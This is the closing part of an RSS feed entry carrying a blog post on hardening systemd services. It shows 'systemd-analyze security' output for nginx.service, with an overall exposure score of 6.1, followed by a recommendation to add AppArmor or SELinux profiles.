✓ RestrictAddressFamilies=~AF_NETLINK                         Service cannot allocate netlink sockets
✗ RootDirectory=/RootImage=                                   Service runs within the host's root directory                          0.1
✓ SupplementaryGroups=                                        Service has no supplementary groups
✗ CapabilityBoundingSet=~CAP_MAC_*                            Service may adjust SMACK MAC                                           0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT                         Service may issue reboot()                                             0.1
✓ Delegate=                                                   Service does not maintain its own delegated control group subtree
✓ LockPersonality=                                            Service cannot change ABI personality
✓ MemoryDenyWriteExecute=                                     Service cannot create writable executable memory mappings
✓ RemoveIPC=                                                  Service user cannot leave SysV IPC objects around
✗ RestrictNamespaces=~CLONE_NEWUTS                            Service may create hostname namespaces                                 0.1
✗ UMask=                                                      Files created by service are world-readable by default                 0.1
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE                  Service may mark files immutable                                       0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK                         Service may lock memory into RAM                                       0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT                       Service may issue chroot()                                             0.1
✓ ProtectHostname=                                            Service cannot change system host/domainname
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND                    Service may establish wake locks                                       0.1
✗ CapabilityBoundingSet=~CAP_LEASE                            Service may create file leases                                         0.1
✗ CapabilityBoundingSet=~CAP_SYS_PACCT                        Service may use acct()                                                 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG                   Service may issue vhangup()                                            0.1
✓ CapabilityBoundingSet=~CAP_WAKE_ALARM                       Service cannot program timers that wake up the system
✗ RestrictAddressFamilies=~AF_UNIX                            Service may allocate local sockets                                     0.1

→ Overall exposure level for nginx.service: 6.1 MEDIUM 😐
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;




&lt;/p&gt;

&lt;p&gt;The score shows there's still room for improvement, but in the end, a lot of potential attack vectors have been mitigated in comparison to the officially provided Unit file.&lt;/p&gt;

&lt;h2&gt;
  
  
  🚀 Where to Continue
&lt;/h2&gt;

&lt;p&gt;In summary, Systemd offers a straightforward method for constraining a process's capabilities, primarily leveraging Linux namespaces. This approach can significantly enhance security, but it does have its constraints. That is where Mandatory Access Control steps in, with tools such as &lt;a href="https://ubuntu.com/server/docs/security-apparmor" rel="noopener noreferrer"&gt;AppArmor&lt;/a&gt; and &lt;a href="https://www.redhat.com/en/topics/linux/what-is-selinux" rel="noopener noreferrer"&gt;SELinux&lt;/a&gt; providing fine grained control over system access. These tools enable a more nuanced approach to restricting system access, albeit with a more intricate configuration process. It's worth noting that numerous Linux distributions provide predefined profiles for a wide range of services, simplifying the implementation of these controls.&lt;/p&gt;

&lt;p&gt;Ultimately, achieving a balance between security and practical implementation boils down to leveraging Systemd's capabilities alongside predefined Mandatory Access Control profiles. This approach strikes an effective compromise, ensuring both enhanced security and efficient deployment timelines.&lt;/p&gt;

</description>
      <category>systemd</category>
      <category>security</category>
      <category>linux</category>
      <category>kubernetes</category>
    </item>
  </channel>
</rss>
